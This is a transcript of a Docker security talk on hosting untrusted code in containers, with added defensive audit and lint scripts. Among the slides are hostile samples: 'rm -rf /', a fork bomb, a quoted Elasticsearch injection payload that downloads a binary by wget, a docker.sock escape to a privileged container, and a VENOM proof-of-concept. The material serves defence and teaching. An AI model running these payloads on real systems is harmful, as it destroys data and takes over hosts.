
Lessons from running potentially malicious code inside containers

Lessons from running potentially malicious code inside containers.

Short talk given at Docker Oxford / doxford

Published in: Software

  1. Lessons from running potentially malicious code inside containers. @Ben_Hall, Ben@BenHall.me.uk, Ocelot Uproar / Katacoda.com
  2. WHOAMI? @Ben_Hall / Blog.BenHall.me.uk. Docker London organiser. Software development studio.
  3. “What happens when you give anonymous unrestricted access to a hosted Docker container & daemon?” This is how we [try to] protect ourselves.
  4. Learn via interactive browser-based labs: Katacoda.com
  5. Docker security practices: multi-tenant systems, PaaS, CI servers, untrusted 3rd parties.
  6. The first “hack”
  7. $ whoami
     $ pwd
     $ cd /
     $ ls
     $ apt-get install <some package>
     $ passwd
     $ rm -rf /
  8. Dockerfile:
     RUN adduser <new user>
     USER <new user>
     $ docker run -u <new user>
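Slides 7 and 8 make the point that a container runs as root unless the image's last USER instruction or a `docker run -u` override says otherwise. As an added example (my own script, not from Ben's talk), here is a small POSIX shell audit that reports which user a Dockerfile leaves the container running as. It assumes USER arguments are literal names or ids rather than ${VARIABLE} references, and the Dockerfiles it checks are constructed samples.

```sh
#!/bin/sh
# Added example, not from the talk: audit a Dockerfile for the user the
# container will run as. Docker starts the process as root unless the image's
# last USER instruction or `docker run -u` says otherwise.

# normalize_user NAME: strip any ":group" suffix and map root/0/empty to "root".
normalize_user() {
    u=$(printf '%s' "$1" | sed 's/:.*//')
    case "$u" in
        ""|0|root) echo root ;;
        *)         echo "$u" ;;
    esac
}

# dockerfile_final_user FILE: print the user set by the LAST USER instruction
# (comment lines ignored, keyword case-insensitive), or "root" if there is none.
# Assumption (simplification of mine): USER arguments are literal names or ids,
# not ${VARIABLE} references.
dockerfile_final_user() {
    last=$(awk '
        /^[ \t]*#/ { next }                         # skip comment lines
        toupper($1) == "USER" && NF >= 2 { u = $2 } # remember the latest USER
        END { print u }                             # empty when never set
    ' "$1")
    normalize_user "$last"
}

# effective_user FILE [RUN_USER]: user the container actually runs as, taking a
# `docker run -u RUN_USER` override into account when one is given.
effective_user() {
    if [ -n "$2" ]; then
        normalize_user "$2"
    else
        dockerfile_final_user "$1"
    fi
}

# runs_as_root FILE [RUN_USER]: exit 0 when the container would run as root.
runs_as_root() {
    [ "$(effective_user "$1" "$2")" = root ]
}

# Constructed sample Dockerfiles written to a temporary directory.
SAMPLES=$(mktemp -d)
printf 'FROM ubuntu:16.04\nRUN apt-get update\nCMD ["bash"]\n' \
    > "$SAMPLES/Dockerfile.root"
printf 'FROM ubuntu:16.04\nRUN adduser --disabled-password --gecos "" app\nUSER app:app\nCMD ["bash"]\n' \
    > "$SAMPLES/Dockerfile.app"
printf 'FROM ubuntu:16.04\n# USER app   <- commented out, must be ignored\nuser app\nUSER root\nCMD ["bash"]\n' \
    > "$SAMPLES/Dockerfile.reroot"

# Report: one line per sample, flagging anything that ends up as root.
for f in "$SAMPLES"/Dockerfile.*; do
    if runs_as_root "$f"; then
        verdict="ROOT - add a USER instruction or pass -u"
    else
        verdict="ok"
    fi
    printf '%-45s user=%-6s %s\n' "$f" "$(effective_user "$f")" "$verdict"
done
```

The check deliberately takes the last USER instruction, since an image can switch back to root after creating an unprivileged user, and it treats a numeric `0` the same as `root`. Run it against a real file with `effective_user ./Dockerfile` or, to model a launch override, `effective_user ./Dockerfile 1000:1000`.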
  9. $ uptime
     $ free -m
     $ df -h
     $ cat /proc/cpuinfo
     $ uname -a
  10. $ reboot
      $ shutdown now
  11. “It also allows the container to access local network services like D-bus and is therefore considered insecure”
      $ docker run --net=host -it ubuntu bash
      root@ubuntu:/# shutdown now
      root@ubuntu:/#
      $ docker run --net=host -it ubuntu bash
      Post http://docker:4243/v1.20/containers/create: EOF.
      * Are you trying to connect to a TLS-enabled daemon without TLS?
      * Is your docker daemon up and running?
  12. Docker out of the box covers a lot but not everything…
  13. $ while :; do echo 'Hello World'; done
  14. Log rotation since 1.8
  15. $ fallocate
      Operation Not Supported
      $ truncate
      $ dd
  16. Root users can write to it. If you can write to it, you can fill it.
      $ ls /docker/aufs/diff/<container-id>/
      $ cat /docker/containers/<container-id>/hosts
  17. Bandwidth
  18. Difficult to restrict
  19. CGroups and Namespaces
  20. CPU Shares
  21. :(){ :|: & };:
  22. $ docker run -d -u daemon --ulimit nproc=3 busybox top
      $ docker run -d -u daemon --ulimit nproc=3 busybox top
      $ docker run -d -u daemon --ulimit nproc=3 busybox top
      $ docker run -d -u daemon --ulimit nproc=3 busybox top
      efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398
      Error response from daemon: Cannot start container efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 : [8] System error: resource temporarily unavailable
  23. Cgroup settings: limit a container to a share of the resource
      > --cpu-shares
      > --cpuset-cpus
      > --memory-reservation
      > --kernel-memory
      > --blkio-weight (block IO)
      > --device-read-iops
      > --device-write-iops
  24. Namespaces limit what a container can see…
  25. Seccomp & AppArmor
  26. The Warden: based on the Docker API + magic. Snort for Docker?
  27. Sysdig Falco
  28. What happens when it all goes wrong?
  29. Hosting provider becomes unhappy
  30. org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;\nimport java.io.*;\nString str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xdvi http://<IP Address>:9985/xdvi\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"}}}]]
      http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
  31. C /bin
      C /bin/netstat
      C /bin/ps
      C /bin/ss
      C /etc
      C /etc/init.d
      A /etc/init.d/DbSecuritySpt
      A /etc/init.d/selinux
      C /etc/rc1.d
      A /etc/rc1.d/S97DbSecuritySpt
      A /etc/rc1.d/S99selinux
      C /etc/rc2.d
      A /etc/rc2.d/S97DbSecuritySpt
      A /etc/rc2.d/S99selinux
      C /etc/rc3.d
      A /etc/rc3.d/S97DbSecuritySpt
      A /etc/rc3.d/S99selinux
      C /etc/rc4.d
      A /etc/rc4.d/S97DbSecuritySpt
      A /etc/rc4.d/S99selinux
      C /etc/rc5.d
      A /etc/rc5.d/S97DbSecuritySpt
      A /etc/rc5.d/S99selinux
      C /etc/ssh
      A /etc/ssh/bfgffa
      A /os6
      A /safe64
      C /tmp
      A /tmp/.Mm2
      A /tmp/64
      A /tmp/6Sxx
      A /tmp/6Ubb
      A /tmp/DDos99
      A /tmp/cmd.n
      A /tmp/conf.n
      A /tmp/ddos8
      A /tmp/dp25
      A /tmp/frcc
      A /tmp/gates.lod
      A /tmp/hkddos
      A /tmp/hsperfdata_root
      A /tmp/linux32
      A /tmp/linux64
      A /tmp/manager
      A /tmp/moni.lod
      A /tmp/nb
      A /tmp/o32
      A /tmp/oba
      A /tmp/okml
      A /tmp/oni
      A /tmp/yn25
      C /usr
      C /usr/bin
      A /usr/bin/.sshd
      A /usr/bin/dpkgd
      A /usr/bin/dpkgd/netstat
      A /usr/bin/dpkgd/ps
      A /usr/bin/dpkgd/ss
      http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
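The listing on slide 31 is in `docker diff` format (A = added, C = changed, D = deleted). As an added example, not from the talk or the linked blog post, the following shell script turns such a diff into a triage report: it flags rewritten process and socket inspection binaries, new init scripts, and new files under /tmp, /usr/bin and /etc/ssh, while allow-listing the hsperfdata directory the JVM creates for any Java process such as Elasticsearch. The sample input is a constructed subset of the slide's listing with two benign log entries added, and the severity rules are my own heuristics rather than a Docker or Sysdig feature.

```sh
#!/bin/sh
# Added example, not from the talk: triage `docker diff` output (A = added,
# C = changed, D = deleted) for the persistence and binary-replacement patterns
# seen on slide 31. The rule set is my own, not a Docker or Sysdig feature.

# Constructed sample: a subset of the slide's listing plus two benign
# Elasticsearch log entries so the allow-list path is exercised too.
SAMPLE_DIFF='C /bin
C /bin/netstat
C /bin/ps
C /bin/ss
C /etc/init.d
A /etc/init.d/DbSecuritySpt
A /etc/init.d/selinux
A /etc/rc2.d/S97DbSecuritySpt
A /etc/ssh/bfgffa
A /tmp/DDos99
A /tmp/hsperfdata_root
A /usr/bin/.sshd
A /usr/bin/dpkgd/ps
C /var/log/elasticsearch
A /var/log/elasticsearch/cluster.log'

# triage_diff: read docker diff lines on stdin, print "SEVERITY reason path".
triage_diff() {
    awk '
    NF == 2 {
        kind = $1; path = $2
        # Core process/socket inspection tools rewritten: a classic way to hide
        # a miner or DDoS bot from ps/netstat inside the container.
        if (kind == "C" && path ~ /^\/(bin|usr\/bin)\/(ps|netstat|ss|ls|lsof|top)$/) {
            print "HIGH   replaced-inspection-binary", path; next
        }
        # New init scripts or rcN.d entries: boot-time persistence.
        if (kind == "A" && path ~ /^\/etc\/(init\.d|rc[0-6S]\.d)\//) {
            print "HIGH   new-init-script", path; next
        }
        # New files in /tmp, except the JVM perf-data directory Elasticsearch
        # itself creates (hsperfdata_<user>).
        if (kind == "A" && path ~ /^\/tmp\// && path !~ /^\/tmp\/hsperfdata_/) {
            print "MEDIUM new-file-in-tmp", path; next
        }
        # Additions under /usr/bin or /etc/ssh in a container that should not
        # be installing binaries or SSH material at runtime.
        if (kind == "A" && path ~ /^\/(usr\/bin|etc\/ssh)\//) {
            print "MEDIUM new-system-file", path; next
        }
        print "INFO   unclassified", path
    }'
}

# count_findings SEVERITY: number of triage lines at that severity (stdin = diff).
count_findings() {
    triage_diff | awk -v s="$1" '$1 == s' | wc -l | tr -d ' '
}

# Demo on the constructed sample. Against a live container the pipeline is:
#   docker diff <container-id> | triage_diff
printf '%s\n' "$SAMPLE_DIFF" | triage_diff | sort
```

A read-only root filesystem (slide 32) makes most of these entries impossible in the first place, which is why the diff for a hardened container should be short enough to review by eye; the triage is for the containers that still need a writable root.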
  32. Read-only containers
      > docker run --read-only -v /data:/data elasticsearch
  33. Is Docker secure?
      • Yes. It’s as secure as your practices are.
      • The ElasticSearch hack would have taken over the entire box.
      • I’ve pointed out the bad bits.
      • New game, new rules to play by.
  34. $ docker run benhall/cute-kittens
      Error: Missing docker.sock
      Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
      $ docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
  35. if [ -e /var/run/docker.sock ]; then
          echo "**** Launching ****"
          docker run --privileged busybox ls /dev
          echo "**** Cute kittens ****"
      else
          echo "Error: Missing docker.sock"
      fi
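Slides 11, 16, 21 to 23, 32 and 34 to 35 each argue for a launch-time control: no host networking, a read-only root filesystem, a non-root user, a process limit, memory and CPU limits, and never handing a container the docker.sock. As an added example (mine, not from the talk), this shell lint checks a `docker run` command line against those rules before anything is launched, so it can sit in a CI gate or a deploy wrapper. The flags it looks for are real `docker run` options; only the spellings handled in its case statement are recognised, which is a simplification of mine. The three command lines are constructed, two of them taken from the slides.

```sh
#!/bin/sh
# Added example, not from the talk: a pre-launch lint for `docker run` command
# lines implementing the rules this deck argues for. It runs offline on the
# command string and never invokes Docker. Only the flag spellings handled in
# the case statement are recognised (a simplification of mine).

note() {                      # note SEVERITY MESSAGE: record and print one finding
    findings=$((findings + 1))
    printf '%-6s %s\n' "$1" "$2"
}

# lint_docker_run "docker run ...": print findings; exit 0 only when there are none.
lint_docker_run() {
    findings=0
    ro=0; user=0; nproc=0; mem=0; cpu=0; sock=0
    # Intentional word splitting: the sample commands have no quoted arguments.
    set -- $1
    while [ $# -gt 0 ]; do
        case "$1" in
            --privileged)
                note HIGH "--privileged drops nearly every isolation boundary" ;;
            --net=host|--network=host)
                note HIGH "host networking reaches the daemon port and local services such as D-bus (slide 11)" ;;
            --net|--network)
                if [ "$2" = host ]; then
                    note HIGH "host networking reaches the daemon port and local services such as D-bus (slide 11)"
                fi ;;
            --read-only)                          ro=1 ;;
            -u|--user|-u*|--user=*)               user=1 ;;
            --ulimit)                             case "$2" in nproc=*) nproc=1 ;; esac ;;
            --ulimit=nproc=*|--pids-limit|--pids-limit=*) nproc=1 ;;
            -m|--memory|-m*|--memory=*)           mem=1 ;;
            --cpu-shares|--cpu-shares=*|--cpus|--cpus=*|--cpuset-cpus|--cpuset-cpus=*) cpu=1 ;;
            -v|--volume|--mount)
                case "$2" in *docker.sock*) sock=1 ;; esac ;;
            -v*|--volume=*|--mount=*)
                case "$1" in *docker.sock*) sock=1 ;; esac ;;
        esac
        shift
    done
    [ "$sock" -eq 0 ]  || note HIGH   "mounts docker.sock: the container can start --privileged containers on the host (slides 34-35)"
    [ "$ro" -eq 1 ]    || note MEDIUM "no --read-only: a writable root filesystem can be filled or trojaned (slides 16, 32)"
    [ "$user" -eq 1 ]  || note MEDIUM "no -u/--user: runs as root unless the image's USER says otherwise (slide 8)"
    [ "$nproc" -eq 1 ] || note MEDIUM "no --ulimit nproc= or --pids-limit: a fork bomb can exhaust the host (slides 21-22)"
    [ "$mem" -eq 1 ]   || note MEDIUM "no --memory: the container can take all host RAM (slide 23)"
    [ "$cpu" -eq 1 ]   || note LOW    "no --cpu-shares/--cpus/--cpuset-cpus (slide 23)"
    [ "$findings" -eq 0 ]
}

# lint_count "docker run ...": number of findings, for scripting or CI gates.
lint_count() {
    lint_docker_run "$1" | wc -l | tr -d ' '
}

# Constructed command lines: the two risky launches from the deck and a hardened
# one using real docker run flags (--pids-limit needs Docker 1.11 or later).
SOCK_CMD='docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens'
HOSTNET_CMD='docker run --net=host -it ubuntu bash'
HARDENED_CMD='docker run -d --read-only -u daemon --ulimit nproc=64 --pids-limit 64 --memory 256m --cpu-shares 512 --cap-drop ALL -v /data:/data elasticsearch'

for cmd in "$SOCK_CMD" "$HOSTNET_CMD" "$HARDENED_CMD"; do
    printf '\n$ %s\n' "$cmd"
    if lint_docker_run "$cmd"; then echo "   clean"; fi
done
```

The lint treats a docker.sock bind mount as the most serious finding because, as slide 35 shows, anything holding the socket can ask the daemon for a `--privileged` container and is effectively root on the host; the missing-limit findings are the ones that turn a single noisy tenant into a host outage.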
  36. DockerBench.com
  37. Think VMs contain?
      • CVE-2016-3710: QEMU out-of-bounds memory access issue
      • VENOM (QEMU/KVM): attack via the floppy driver
      #include <sys/io.h>
      #define FIFO 0x3f5
      int main() {
          int i;
          iopl(3);
          outb(0x0a, 0x3f5); /* READ ID */
          for (i = 0; i < 10000000; i++)
              outb(0x42, 0x3f5); /* push */
      }
  38. Available for one/two day Microservice/Docker security training
  39. Thank you! www.Katacoda.com @Ben_Hall Ben@BenHall.me.uk Blog.BenHall.me.uk
